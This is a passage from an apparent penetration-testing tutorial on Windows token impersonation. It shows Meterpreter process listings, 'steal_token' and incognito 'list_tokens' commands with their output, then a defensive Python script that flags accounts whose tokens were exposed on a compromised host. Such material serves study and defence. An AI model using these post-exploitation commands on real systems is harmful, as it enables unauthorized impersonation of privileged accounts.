 1092  704   svchost.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1144  704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1180  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1480  1444  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
 1496  1456  conime.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\conime.exe
 1580  704   spoolsv.exe        x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1728  704   alg.exe            x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\System32\alg.exe
 1852  1480  VMwareTray.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 1860  1480  VMwareUser.exe     x86   0           ROOT-9743DD32E3\Administrator  C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 1888  1480  ctfmon.exe         x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\ctfmon.exe
 1956  1092  wscntfy.exe        x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\wscntfy.exe


The intrusion succeeded and we have a shell.


meterpreter > steal_token 632
Stolen token with username: ROOT-9743DD32E3\Administrator
meterpreter > 

The domain administrator account has been impersonated successfully.

If ps does not list any process run by the domain administrator, use the following commands.

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
No tokens available

Impersonation Tokens Available
========================================
No tokens available

meterpreter > 
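What the two ps listings and the steal_token step above demonstrate is that every account with a process on a host has a token resident there, and once the host is compromised each of those tokens is available to whoever controls it. The script below is an added example, not code from the original post or from Metasploit: it parses the fixed-width table that Meterpreter's ps prints (a trimmed, constructed copy of the second listing is embedded) and reports which non-service accounts had a token on the machine, which is the list an incident responder should treat as exposed. The names parse_ps, tokens_by_user and exposed_accounts are the example's own.

```python
"""Token-exposure triage from a Meterpreter 'ps' listing.

Added example for this page, not part of the original post or of Metasploit.
It parses the fixed-width process table printed by Meterpreter's `ps` (the
layout shown above) and answers the responder's question that steal_token
raises: which accounts had a token resident on this host while it was
compromised?  Those accounts must be treated as exposed.
"""
from collections import defaultdict

# Constructed sample: a trimmed copy of the second `ps` listing above,
# with the same column layout (widths are taken from the header row).
SAMPLE_PS = r"""
Process List
============

 PID   PPID  Name               Arch  Session     User                           Path
 ---   ----  ----               ----  -------     ----                           ----
 0     0     [System Process]         4294967295
 4     0     System             x86   0           NT AUTHORITY\SYSTEM
 588   4     smss.exe           x86   0           NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 632   1480  cmd.exe            x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\system32\cmd.exe
 716   660   lsass.exe          x86   0           NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 968   704   svchost.exe        x86   0           NT AUTHORITY\NETWORK SERVICE   C:\WINDOWS\system32\svchost.exe
 1180  704   svchost.exe        x86   0           NT AUTHORITY\LOCAL SERVICE     C:\WINDOWS\system32\svchost.exe
 1480  1444  explorer.exe       x86   0           ROOT-9743DD32E3\Administrator  C:\WINDOWS\Explorer.EXE
"""

COLUMNS = ("PID", "PPID", "Name", "Arch", "Session", "User", "Path")

# Built-in service identities: their tokens exist on every Windows box and
# are not a credential that can be rotated, so they are reported separately.
SERVICE_ACCOUNTS = {
    r"NT AUTHORITY\SYSTEM",
    r"NT AUTHORITY\LOCAL SERVICE",
    r"NT AUTHORITY\NETWORK SERVICE",
}


def parse_ps(text):
    """Parse the fixed-width table into a list of dicts keyed by COLUMNS.

    Column boundaries are derived from the header line rather than from
    whitespace, because fields such as User contain spaces and the idle
    process row leaves Arch and User empty.
    """
    lines = text.splitlines()
    for i, line in enumerate(lines):
        if line.split() == list(COLUMNS):
            header, data = line, lines[i + 2:]  # skip the dashed separator
            break
    else:
        raise ValueError("no process-list header found")
    starts = [header.index(col) for col in COLUMNS]
    bounds = list(zip(starts, starts[1:] + [None]))
    rows = []
    for line in data:
        if not line.strip():
            continue
        fields = [line[a:b].strip() for a, b in bounds]
        rec = dict(zip(COLUMNS, fields))
        rec["PID"], rec["PPID"] = int(rec["PID"]), int(rec["PPID"])
        rows.append(rec)
    return rows


def tokens_by_user(rows):
    """Map each account to the PIDs running under it.

    Rows with an empty User column (the idle process) are skipped: there is
    no token behind them.
    """
    by_user = defaultdict(list)
    for rec in rows:
        if rec["User"]:
            by_user[rec["User"]].append(rec["PID"])
    return dict(by_user)


def exposed_accounts(rows):
    """Accounts other than the built-in service identities that had a
    process, and therefore a token, on the host."""
    return sorted(user for user in tokens_by_user(rows)
                  if user not in SERVICE_ACCOUNTS)


if __name__ == "__main__":
    procs = parse_ps(SAMPLE_PS)
    for user, pids in sorted(tokens_by_user(procs).items()):
        tag = "service" if user in SERVICE_ACCOUNTS else "EXPOSED"
        print(f"{tag:8} {user:32} pids={pids}")
    print("rotate/investigate:", exposed_accounts(procs))
```

Run it with python3 and it flags ROOT-9743DD32E3\Administrator (PIDs 632 and 1480) as the one exposed account. The incognito warning above makes the same point from the other side: the tokens reachable on a host are bounded by who has logged on to it and by the privilege of the process doing the looking, so keeping administrative accounts off lower-trust machines is what shrinks this list.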


